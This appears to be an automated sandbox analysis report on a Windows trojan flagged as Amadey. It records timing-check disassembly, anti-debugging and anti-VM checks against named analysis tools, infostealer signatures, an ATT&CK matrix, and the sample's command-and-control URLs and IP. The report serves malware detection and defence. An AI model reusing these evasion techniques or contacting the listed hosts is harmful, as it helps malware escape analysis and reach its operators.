Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA1771 second address: 6DA17A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 jmp 00007FE80147ABFFh 0x0000000e leave 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FE80147AC05h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DF0BF6 second address: 6DF0C09 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov di, cx 0x00000009 popad 0x0000000a mov dword ptr [esp], ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DF0C09 second address: 6DF0C1C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80147ABFFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DF0C1C second address: 6DF0C51 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE801498589h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FE80149857Eh 0x00000010 pop ebp 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 mov ax, 6863h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6D90897 second address: 6D908D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80147ABFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov cx, 529Bh 0x0000000f mov edi, esi 0x00000011 popad 0x00000012 push eax 0x00000013 pushad 0x00000014 mov eax, edx 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 mov esi, edx 0x0000001b jmp 00007FE80147AC03h 0x00000020 popad 0x00000021 mov ebp, esp 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6D908D4 second address: 6D908D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6D908D8 second address: 6D908F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80147AC07h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6D908F3 second address: 6D908FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 85h 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6D908FA second address: 6D9091C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE80147AC06h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6D9091C second address: 6D90922 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6D306C4 second address: 6D30720 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE80147AC07h 0x00000009 and cl, 0000005Eh 0x0000000c jmp 00007FE80147AC09h 0x00000011 popfd 0x00000012 jmp 00007FE80147AC00h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FE80147ABFEh 0x00000022 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6D30AB8 second address: 6D30AED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE801498581h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov cx, C893h 0x0000000f call 00007FE801498588h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6D30AED second address: 6D30B32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007FE80147ABFEh 0x0000000c xchg eax, ebp 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FE80147ABFEh 0x00000014 or eax, 18A71778h 0x0000001a jmp 00007FE80147ABFBh 0x0000001f popfd 0x00000020 mov si, 0EAFh 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6D30B32 second address: 6D30B36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6D30B36 second address: 6D30B3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6D30B3C second address: 6D30B42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6D30B42 second address: 6D30B46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6D30B46 second address: 6D30B4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6D80C15 second address: 6D80C19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6D80C19 second address: 6D80C1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6D80C1F second address: 6D80C25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6D80C25 second address: 6D80C29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6D80C29 second address: 6D80C6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a mov al, 34h 0x0000000c mov ax, dx 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 mov cx, B2E9h 0x00000016 mov eax, 4EFC94A5h 0x0000001b popad 0x0000001c xchg eax, ebp 0x0000001d jmp 00007FE80147AC00h 0x00000022 mov ebp, esp 0x00000024 jmp 00007FE80147AC00h 0x00000029 pop ebp 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6D80C6E second address: 6D80C86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE801498583h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6D80C86 second address: 6D80C8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6D80C8C second address: 6D80C90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6D60012 second address: 6D6003F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80147ABFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FE80147AC06h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6D6003F second address: 6D60043 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6D60043 second address: 6D6005F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80147AC08h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6D6005F second address: 6D600A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80149857Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov edi, esi 0x0000000d push ecx 0x0000000e mov dx, 3112h 0x00000012 pop edi 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 jmp 00007FE801498586h 0x0000001b and esp, FFFFFFF0h 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 call 00007FE80149857Ch 0x00000026 pop esi 0x00000027 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6D600A4 second address: 6D600D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ecx, ebx 0x00000008 popad 0x00000009 sub esp, 44h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov edi, ecx 0x00000011 pushfd 0x00000012 jmp 00007FE80147AC00h 0x00000017 or esi, 200DBAB8h 0x0000001d jmp 00007FE80147ABFBh 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6D600D9 second address: 6D60117 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE801498589h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007FE80149857Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FE80149857Dh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6D60117 second address: 6D6011D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6D6011D second address: 6D60147 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80149857Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE801498587h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6D60147 second address: 6D6014D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6D6014D second address: 6D6017B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007FE80149857Ch 0x0000000e mov dword ptr [esp], esi 0x00000011 jmp 00007FE801498580h 0x00000016 xchg eax, edi 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a push ecx 0x0000001b pop ebx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6D602AC second address: 6D602B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6D602B0 second address: 6D602B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6D602B4 second address: 6D602BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6D602BA second address: 6D602C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE80149857Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6D602C9 second address: 6D60314 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 jmp 00007FE80147AC05h 0x0000000e pop esi 0x0000000f jmp 00007FE80147ABFEh 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 movsx edi, si 0x0000001b jmp 00007FE80147AC06h 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6D60314 second address: 6D60326 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE80149857Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6D80AB2 second address: 6D80AD7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80147AC01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE80147ABFDh 0x00000011 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\1o81tDUu5M.exeSpecial instruction interceptor: First address: 10F9349 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\1o81tDUu5M.exeSpecial instruction interceptor: First address: 118191A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_2_00B19980 rdtsc 0_2_00B19980
Source: C:\Users\user\Desktop\1o81tDUu5M.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_2_0093255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0093255D
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_2_009329FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_009329FF
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_2_0093255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0093255D
Source: 1o81tDUu5M.exe, 1o81tDUu5M.exe, 00000000.00000002.1820035397.00000000010D9000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 1o81tDUu5M.exe, 00000000.00000003.1718517701.0000000006F8F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: 1o81tDUu5M.exe, 00000000.00000003.1802788486.00000000016A1000.00000004.00000020.00020000.00000000.sdmp, 1o81tDUu5M.exe, 00000000.00000003.1802595901.0000000001691000.00000004.00000020.00020000.00000000.sdmp, 1o81tDUu5M.exe, 00000000.00000003.1802624909.000000000169E000.00000004.00000020.00020000.00000000.sdmp, 1o81tDUu5M.exe, 00000000.00000003.1802957386.00000000016B0000.00000004.00000020.00020000.00000000.sdmp, 1o81tDUu5M.exe, 00000000.00000002.1820980792.00000000016B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlle": "nngOKyDthKXbiU.exe", "pid": 7176 }, { "name": "nngOKyDthKXbiU.exe", "pid": 7196 }, { "name": "nngOKyDthKXbiU.exe", "pid": 7220 }, { "name": "nngOKyDthKXbiU.exe", "pid": 7244 }, { "name": "nngOKyDthKXbiU.exe", "pid": 7268 }, { "name": "1o81tDUu5M.exe", "pid": 7600 } ], "uptime_minutes": 98, "installed_apps": [ { "app_name": "Google Chrome", "index": 0 }, { "app_name": "Microsoft Edge", "index": 1 }, { "app_name": "Microsoft Edge Update", "index": 2
Source: 1o81tDUu5M.exeBinary or memory string: Hyper-V RAW
Source: 1o81tDUu5M.exe, 00000000.00000003.1718517701.0000000006F8F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: 1o81tDUu5M.exe, 00000000.00000002.1820035397.00000000010D9000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: 1o81tDUu5M.exe, 00000000.00000003.1748157172.0000000001643000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\1o81tDUu5M.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\1o81tDUu5M.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\1o81tDUu5M.exeThread information set: HideFromDebuggerJump to behavior
Potentially malicious time measurement code found
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_2_06D70939 Start: 06D70A0A End: 06D70A040_2_06D70939
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\1o81tDUu5M.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\1o81tDUu5M.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\1o81tDUu5M.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\1o81tDUu5M.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\1o81tDUu5M.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\1o81tDUu5M.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\1o81tDUu5M.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\1o81tDUu5M.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\1o81tDUu5M.exeFile opened: NTICE
Source: C:\Users\user\Desktop\1o81tDUu5M.exeFile opened: SICE
Source: C:\Users\user\Desktop\1o81tDUu5M.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\1o81tDUu5M.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\1o81tDUu5M.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\1o81tDUu5M.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_2_00B19980 rdtsc 0_2_00B19980
Source: 1o81tDUu5M.exe, 1o81tDUu5M.exe, 00000000.00000002.1820035397.00000000010D9000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 0|Program Manager
Source: C:\Users\user\Desktop\1o81tDUu5M.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\1o81tDUu5M.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\1o81tDUu5M.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: 1o81tDUu5M.exe, 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmp, 1o81tDUu5M.exe, 00000000.00000003.1718517701.0000000006F8F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: procmon.exe
Source: 1o81tDUu5M.exe, 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmp, 1o81tDUu5M.exe, 00000000.00000003.1718517701.0000000006F8F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: wireshark.exe

Stealing of Sensitive Information

barindex
Infostealer behavior detected
Source: Signature ResultsSignatures: Mutex created, HTTP post and idle behavior
Leaks process information
Source: global trafficTCP traffic: 192.168.2.4:49731 -> 147.45.113.159:80

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		1
Process Injection		23
Virtualization/Sandbox Evasion		OS Credential Dumping751
Security Software Discovery		Remote Services11
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		1
Process Injection		LSASS Memory23
Virtualization/Sandbox Evasion		Remote Desktop Protocol1
Data from Local System		2
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information		Security Account Manager13
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
Obfuscated Files or Information		NTDS1
Remote System Discovery		Distributed Component Object ModelInput Capture4
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
Software Packing		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials216
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
1o81tDUu5M.exe58%VirustotalBrowse
1o81tDUu5M.exe66%ReversingLabsWin32.Trojan.Amadey
1o81tDUu5M.exe100%AviraTR/Crypt.TPM.Gen
1o81tDUu5M.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
home.twentytk20pn.top
147.45.113.159
truefalse
    		high
    httpbin.org
    		34.226.108.155
    		truefalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322false
        		high
        https://httpbin.org/ipfalse
          		high

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://curl.se/docs/hsts.html1o81tDUu5M.exe, 00000000.00000003.1718517701.0000000006F8F000.00000004.00001000.00020000.00000000.sdmpfalse
            		high
            http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322se1o81tDUu5M.exe, 00000000.00000002.1820625051.000000000160E000.00000004.00000020.00020000.00000000.sdmpfalse
              		unknown
              http://html4/loose.dtd1o81tDUu5M.exe, 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmp, 1o81tDUu5M.exe, 00000000.00000003.1718517701.0000000006F8F000.00000004.00001000.00020000.00000000.sdmpfalse
                		high
                https://curl.se/docs/alt-svc.html#1o81tDUu5M.exefalse
                  		high
                  http://home.twentytk20pn.top/WE1o81tDUu5M.exe, 1o81tDUu5M.exe, 00000000.00000003.1802788486.00000000016A1000.00000004.00000020.00020000.00000000.sdmp, 1o81tDUu5M.exe, 00000000.00000003.1802595901.0000000001691000.00000004.00000020.00020000.00000000.sdmp, 1o81tDUu5M.exe, 00000000.00000003.1802624909.000000000169E000.00000004.00000020.00020000.00000000.sdmp, 1o81tDUu5M.exe, 00000000.00000003.1802957386.00000000016B0000.00000004.00000020.00020000.00000000.sdmp, 1o81tDUu5M.exe, 00000000.00000002.1820980792.00000000016B1000.00000004.00000020.00020000.00000000.sdmpfalse
                    		unknown
                    https://httpbin.org/ipbefore1o81tDUu5M.exe, 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmp, 1o81tDUu5M.exe, 00000000.00000003.1718517701.0000000006F8F000.00000004.00001000.00020000.00000000.sdmpfalse
                      		high
                      https://curl.se/docs/http-cookies.html1o81tDUu5M.exe, 1o81tDUu5M.exe, 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmp, 1o81tDUu5M.exe, 00000000.00000003.1718517701.0000000006F8F000.00000004.00001000.00020000.00000000.sdmpfalse
                        		high
                        https://curl.se/docs/hsts.html#1o81tDUu5M.exefalse
                          		high
                          https://curl.se/docs/http-cookies.html#1o81tDUu5M.exefalse
                            		high
                            https://curl.se/docs/alt-svc.html1o81tDUu5M.exe, 00000000.00000003.1718517701.0000000006F8F000.00000004.00001000.00020000.00000000.sdmpfalse
                              		high
                              http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnY3221o81tDUu5M.exe, 00000000.00000003.1718517701.0000000006F8F000.00000004.00001000.00020000.00000000.sdmpfalse
                                		high
                                http://.css1o81tDUu5M.exe, 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmp, 1o81tDUu5M.exe, 00000000.00000003.1718517701.0000000006F8F000.00000004.00001000.00020000.00000000.sdmpfalse
                                  		high
